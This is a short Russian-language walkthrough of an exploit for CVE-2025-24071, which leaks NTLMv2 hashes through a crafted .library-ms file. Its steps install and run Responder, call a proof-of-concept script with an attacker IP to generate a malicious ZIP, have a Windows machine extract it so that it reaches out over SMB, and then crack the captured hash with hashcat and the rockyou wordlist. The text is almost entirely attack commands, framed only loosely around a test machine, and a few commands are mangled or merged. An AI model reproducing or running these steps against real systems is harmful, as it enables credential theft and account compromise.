
CVE-2025-24071: NTLMv2 Hash Disclosure via .library-ms File
sudo apt update && sudo apt install responder -y
Запустите Responder
sudo responder -I eth0
Установите необходимый модуль Python
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
Будут созданы: testpayload.library-ms testpayload.zip
Перенесите testpayload.zip на тестовую машину Windows 11. Распакуйте ZIP-архив с помощью проводника Windows. Это заставит Windows попытаться обратиться к SMB-пути, что приведёт к утечке NTLM-хеша.
responder -I etho0

Создайте файл hash.txt
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
чаще всего rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
